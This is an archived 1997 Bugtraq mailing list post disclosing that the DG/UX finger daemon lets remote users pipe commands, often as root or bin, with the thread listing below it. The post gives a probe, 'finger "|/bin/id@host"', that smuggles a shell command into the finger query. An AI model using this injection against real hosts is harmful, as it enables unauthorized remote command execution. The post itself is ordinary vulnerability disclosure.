Bugtraq mailing list archives
dgux in.fingerd vulnerability
From: gti () HOPI DTCC EDU (George Imburgia)
Date: Mon, 11 Aug 1997 12:32:38 -0400
Another old bug that won't die. The finger daemon that ships with dgux will allow a remote user to pipe commands, often with uid root or bin. To check for this vulnerability, simply use the RFC compliant syntax; finger /W@host If it returns something like this, it may be vulnerable; Login name: /W In real life: ??? To see the uid in.fingerd is running as, try this; finger "|/bin/id@host" Often, you will see something like this; uid=0(root) gid=0(root) or; uid=2(bin) gid=2(bin) groups=2(bin),3(sys),5(mail) =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= = George Imburgia = = Network Specialist, Computer Services = = Office of the President = = Delaware Tech = =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
Current thread:
- popper and qpopper let you read email from other pop clients dynamo () IME NET (Aug 07)
- Re: popper and qpopper let you read email from other pop clients Ian R. Justman (Aug 08)
- solaris ^[[1J reboot Tobias Oetiker (Aug 10)
- Re: solaris ^[[1J reboot Scott Moseman (Aug 11)
- Re: popper and qpopper let you read email from other pop clients Marc Slemko (Aug 10)
- dgux in.fingerd vulnerability George Imburgia (Aug 11)
- procfs patch (fwd) Alex (Aug 11)
- solaris ^[[1J reboot Tobias Oetiker (Aug 10)
- Getting around non-executable stack (and fix) Solar Designer (Aug 10)
- Re: popper and qpopper let you read email from other pop clients Ian R. Justman (Aug 08)